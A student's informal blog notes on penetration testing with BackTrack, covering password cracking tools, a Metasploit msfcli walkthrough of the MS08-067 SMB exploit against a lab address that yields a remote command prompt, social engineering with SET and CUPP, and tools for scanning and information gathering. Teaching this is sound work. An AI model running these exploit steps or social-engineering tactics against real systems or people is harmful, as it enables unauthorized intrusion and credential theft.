Privilage Escalation

Last week I just have a class in my university about the PRIVILEGE ESCALATION. What I got from this topic is:

– Authentication can be founded in three things which are something you know, something you have and who you are.

-There are two types of password attack which are offline attack(get the physical access to the machine) and online attack(attack from distance/ remotely)

– offline cracking tools such as rainbow crack, samdump, John The Ripper, Ophcrack(to crack the password), crunch, and wyd.

– online cracking tools such as BruteSSH, Hydra, Dsniff, and wireshark(TCPdump)

– The man in the middle attack which means that we as the attacker disguise our mac address as the gateaway of the network transaction between two or more clients.

TARGET EXPLOITATION

After we discover the target’s information, description, open ports, and vulnerabilitites, now we can start to exploit the target. This step is practically finalizes the penetration testing. Because it is a test to a target to discover wether the target can be exploited or not.

 

In this demonstration I use “metasploit”

 

Try to follow this step with me:

 

First of all you have to download the backtrack 5 from the internet. You can have it at http://www.backtrack-linux.org/downloads/

 

Run the following commands:

# cd /pentest/exploits/framework/

# ./msfcli -h

# ./msfcli windows/smb/ms08_067_netapi O

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P

# ./msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7

ImageImage

Image

Image

 

And now you already connected with your target’s command prompt 🙂 enjoy the exploitation

 

SOCIAL ENGINEERING

Social engineering is basically is a process of gathering confidential information about a target from another person by communicating with them. There are two common tactics that are applied to accomplish this task which are by interviewing another person or by interrogating another person. But the second one is actually a bit violence than the interviewing one. So from that I prefer the first one which is the interviewing one. But, people also will not let you know about the confidential information that they have to a people that they never talk before or to a stranger. So, in order to have the information you needed from them you have to make them “trust” you. If not you will not be able to obtain the confidential information you needed from them.  

 

Below are the demonstration of social engineering process using  SET and CUPP tools:

SET:

ImageImageImageImage

Image

CUPP:

Image

basically this cupp is to list all the possible password from someone using their personal information.

VULNERABILITY MAPPING

Vulnerability mapping is a process to determine and analyzing the critical security flaws and the holes within the target environment. This process is also being called “VULNERABILITY ASSESSMENT”. There are 2 types of vulnerability which are LOCAL VULNERABILITY and REMOTE VULNERABILITY. Local vulnerability is a system to find the vulnerabilities on which the attacker requires local access while remote vulnerability is a system to find the vulnerabilities which can be accomplished by triggering the malicious piece of code over the network.

 

Below are the demonstration of VULNERABILITY MAPPING process using some tools:

OPEN VAS:

Before using this tool  you have to setup it first.

you can do the setup process by following steps that provided by this link:

http://www.backtrack-linux.org/wiki/index.php/OpenVas

 

And these are some screen shots from OPEN VAS tool

 

Image

Image

Image

Image

Image

Image

JBROFUZZ:

To open it we type:

# cd /pentest/fuzzers/jbrofuzz/

# java -jar JBroFuzz.jar

ImageImageImageImage

Enumerating Target

Enumerating target is a process used to find and collect information on ports and services available on the target environment. This process usually be done after we already discover the alive target through the target discovery process.

 

To enumerate the target, we can use PORT SCANNING method. The purpose is to find the open port to be access by us.

 

Below are the demonstrations of ENUMERATING TARGET using some tools:

SUPERSCAN:

Image

Image

NMAP:

Image

ZENMAP:

Image

From this we can conclude that port scanning will resulted to open ports, closed ports, or filtered ports.

TARGET DISCOVERY

In target discovery process, what we must do is to look for all of the target which is alive and which is not alive. One of the common ways to do this is to use ICMP ECHO packets and test it to the network system to discover which target is alive and which target is not alive.

 

Below are the demonstration of TARGET DISCOVERY process using some tools:

 

FPING:

Image

ARPING:

Image

HPING:

Image

ZENMAP:

Image

Information Gathering Tools

Information gathering is a very strong process in doing the penetration testing. Before we do the penetration testing we must to gather all of the information from the outside as much as we can. Because it just like a usual logic, how can we go through the security system without knowing the information about that system in the first place?

 

Below are the demonstration of information gathering process using several information gathering tools such as sam spade, nslookup, and maltego:

SAM SPADE:

Image

From that tools, I just type the domain of the website you want to find the information and after that SAM SPADE will generate the information about that webisite, for example the DNS, IP address, the last update, the must updated date, etc

 

NSLOOKUP:

 

Image

just type the domain name of a website in the nslookup and after that it will generate the information about that website for example: DNS.

 

MALTEGO:

Image

From this maltego tools, we can obtain so much information about people, company, intitution, etc. we can obtain email address, DNS, and many personal information.